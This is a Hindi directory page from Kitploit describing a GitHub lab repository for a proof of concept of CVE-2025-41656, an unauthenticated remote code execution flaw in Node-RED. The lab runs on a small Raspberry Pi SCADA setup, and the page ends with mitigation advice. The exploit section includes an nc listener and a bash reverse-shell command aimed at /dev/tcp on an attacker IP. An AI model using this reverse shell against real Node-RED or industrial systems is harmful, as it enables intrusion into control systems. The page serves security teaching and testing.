Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-41656 — इस रिपॉज़िटरी में CVE-2025-41656 के लिए PoC का परीक्षण और निष्पादन करने हेतु आवश्यक कोड और फ़ाइलें शामिल हैं। | Kitploit
उपकरण/GitHubGitHub/wallyschag/cve-2025-41656
IoT सुरक्षाभेद्यता विश्लेषणशोषणSCADA/ICS सुरक्षालर्निंग और शिक्षालैब और अभ्यास
GitHubwallyschag/cve-2025-41656

CVE-2025-41656

इस रिपॉज़िटरी में CVE-2025-41656 के लिए PoC का परीक्षण और निष्पादन करने हेतु आवश्यक कोड और फ़ाइलें शामिल हैं।

रिपॉजिटरी देखें
2410 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-41656

प्रोजेक्ट सारांश

यह प्रोजेक्ट CVE-2025-41656 को मॉडल करने के लिए मौजूद है, जो NodeRED के लिए एक अप्रमाणित रिमोट कोड निष्पादन भेद्यता है। इस भेद्यता को मॉडल करने के लिए, हमने एक Raspberry Pi, एक एक्चुएटर और एक सेंसर के साथ एक छोटे फॉर्म फैक्टर वाला SCADA सिस्टम बनाया। Raspberry Pi में एक NodeRED और OpenPLC कंटेनर है जो एक्चुएटर को नियंत्रित करने के लिए Modbus TCP पर एक-दूसरे के साथ संचार करते हैं। यह CVE-2025-41656 हमले को अंजाम देने के लिए एक Python प्रूफ ऑफ कॉन्सेप्ट स्क्रिप्ट है। लक्ष्य सफलतापूर्वक एक PoC बनाना और सिस्टम को सुरक्षित करने के लिए सुधार के उपाय खोजना है।

आरंभ करना

लैब में निम्नलिखित हिस्से शामिल होंगे

  • Rasberry Pi 3b+
  • NodeRED और OpenPLC कंटेनरों के साथ Docker compose फ़ाइल
  • एक एक्चुएटर
  • एक सेंसर
  • एक्चुएटर द्वारा नियंत्रित एक मोटर चालित उपकरण
  • नोट: आपके पास मौजूद हार्डवेयर के आधार पर सेटअप अलग होगा। तदनुसार समायोजित करें।

सॉफ़्टवेयर इंस्टॉलेशन

root@kitploit:~
git clone [email protected]:wallyschag/CVE-2025-41656.git
cd CVE-2025-41656
git clone https://github.com/thiagoralves/OpenPLC_v3.git

Docker सेटअप

root@kitploit:~
rm OpenPLC_v3/Dockerfile && cp Dockerfile_WiringPi OpenPLC_v3/Dockerfile
docker compose up --build -d
  • सत्यापित करें कि Docker कंटेनर और नेटवर्क ब्रिज चालू और चल रहे हैं
root@kitploit:~
docker container ls
docker network inspect csci587-final-project_scadanet
  • दोनों Docker कंटेनर चालू होने चाहिए।
  • यह भी सुनिश्चित करें कि दोनों कंटेनर नेटवर्क से जुड़े हैं और उनके पास एक निर्धारित IP पता है।

एक्सप्लॉइट

  • होस्ट मशीन पर nc -lvnp 1234 चलाएँ
  • cve_2025_41656.py में NODE_RED_IP और NODE_RED_PORT को अपनी NodeRED सेवा के IP पते और पोर्ट (1880) से बदलें।
  • cve_2025_41656 के अंदर, लाइन "command": "bash -c 'bash -i >& /dev/tcp/192.168.4.223/1234 0>&1'", में दिए गए IP पते को उस मशीन के IP पते से बदलें जिससे आप एक्सप्लॉइट लॉन्च कर रहे हैं।
root@kitploit:~
python3 cve_2025_41656.py
  • अब आपके पास NodeRED कंटेनर पर एक रिवर्स शेल होना चाहिए।

शमन रणनीतियाँ

  • NodeRED के लिए TLS और एक प्रमाणीकरण तंत्र लागू करें।
  • NodeRED तक अनधिकृत पहुँच को रोकने के लिए SCADA नेटवर्क को सेगमेंट करें।
  • रिवर्स शेल ट्रैफ़िक की तलाश में IDS/IPS सिस्टम के साथ NodeRED वाले नेटवर्क की निगरानी करें।
टूल डाउनलोड करें